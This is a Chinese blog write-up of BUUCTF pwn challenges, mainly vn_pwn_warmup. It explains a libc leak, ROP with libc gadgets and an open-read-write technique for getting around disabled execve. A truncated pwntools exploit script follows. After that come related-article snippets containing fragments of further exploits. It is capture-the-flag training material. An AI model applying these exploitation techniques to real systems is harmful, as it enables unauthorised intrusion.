buuctf刷题记录(一)

最新推荐文章于 2022-07-04 22:57:08 发布
最新推荐文章于 2022-07-04 22:57:08 发布
阅读量378 收藏
点赞数
分类专栏: buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571856/article/details/107536127
版权
这篇博客记录了作者在buuctf刷题过程中的经验,涉及了多个pwn题目,包括vn_pwn_warmup、others_babystack和vn_pwn babypwn1等。在面对开启NX和PIE保护,以及execve禁用的情况,作者学习了如何利用orw技巧和ROP链来实现shell的获取。在vn_pwn_warmup中,通过puts地址获取libc基址,并利用bss段的pop_di gadget;在others_babystack中,利用栈溢出和puts泄露信息;在vn_pwn babypwn1中,利用srop和libc的bss段进行栈迁移。
摘要由CSDN通过智能技术生成

vn_pwn_warmup

在这里插入图片描述
开了nx和pie
在这里插入图片描述
这里给了puts的地址,可以得到libc的基地址
在这里插入图片描述
只有这里有个溢出点能溢出0x10个字节
原本的想法是直接用one_gadget来获得shell
但是一直都打不通,由于开了pie也没法本地调试
后来看了大佬的题解,才知道这个题禁用了execve。现在也不知道从哪里看出来的。
对于这种禁用execve或者没法使用system直接getshell的题。
我们可以使用orw来做。
可以把paylaod写到这里
在这里插入图片描述
然后在跳到这里执行
但是这个题没法用题目文件里的rop_gadget,看了题解才知道原来 libc库里有我们需要的bss,pop_di。用ROPgadget --binary libc --only ‘pop|ret’ | grep ‘rdi’ 和 readelf -S libc | grep “.bss”获取。
get到一个新的知识点。

所以先用read写入flag到bss段,然后orw打印flag
在第一个rop结束之后,栈正好恢复到上一个函数,因此可以继续执行rop

exp

#coding:utf-8
from pwn import*
context(log_level = 'debug')
io = remote ('node3.buuoj.cn',28559)
#io = process('/media/psf/CTF/vn_pwn_warmup')
elf = ELF('/media/psf/CTF/vn_pwn_warmup')
#libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
libc = ELF('/media/psf/CTF/libc/1664libc-2.23.so')
io.recvuntil("0x")

puts_addr=int(io.recv(12),16)
libc_base=puts_addr-libc.sym['puts']
print hex(libc_base
最低0.47元/天 解锁文章
瞬间”Heart Attack
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 928
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 432
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 519
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 281
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3222
前言 开始刷一刷Buuctf的PWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf刷题记录(6)
weixin_53409153的博客
08-03 310
[MRCTF2020]Xor 查壳: 拖入IDA中: 跟进,但是我们无法对关键函数sub_401090查看伪代码: 然后我们就直接看: 再函数中可以看到v0和byte_4212c0按位异或,最后得到byte_41EA08就会输出right,然后再查看: 最后再写脚本: a="MSAWB~FXZ:J:`tQJ\"N@ bpdd}8g" s="" for i in range(len(a)): s+=chr(i^ord(a[i])) print (s) 运行得到: MRCTF{@_R3@
buuctf刷题记录(3)
weixin_53409153的博客
07-19 669
[ACTF新生赛2020]rome 首先,还是查壳: 无壳,为32位: 跟进,跳转到交叉应用列表: 然后,在F5查看伪代码: int func() { int result; // eax int v1; // [esp+14h] [ebp-44h] int v2; // [esp+18h] [ebp-40h] int v3; // [esp+1Ch] [ebp-3Ch] int v4; // [esp+20h] [ebp-38h] unsigned __int8 v5; /
buuctf 刷题记录(三)
pwnyuan's blog
11-18 3315
Brefore 害,还是buu的水题,我太菜了,只能写一分题 ┭┮﹏┭┮ Crypto [GUET-CTF2019]BaByRsa 思路:给了p+q,给了(p+1)*(q+1) ,简单的数学解方程,然后就直接基本rsa (p+1) * (q+1) - 1 - (p+q) ==> p * q (p+q)^2 - 4 * p * q ==> (p-q)^2 ==> (p-q) ( (p+q) +(p-q) ) //2 ==> p ==>q exp import gmp
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 521
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 276
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 242
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1145
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 241
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 555
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2022
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
【PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 667
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 602
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
[BUUCTF-pwn]——pwnable_orw   (ORW)
Y_peak的博客
03-16 1196
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
buuctf misc 另外一个世界
最新发布
03-16
buuctf misc 另外一个世界是指在计算机安全比赛中,misc类型的题目通常是指一些杂项的题目,它们可能与其他类型的题目不太相似,需要参赛者拥有广泛的知识和技能才能解决。而另外一个世界指的是这道题目的思路和解决方法和我们平常见到的完全不同。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值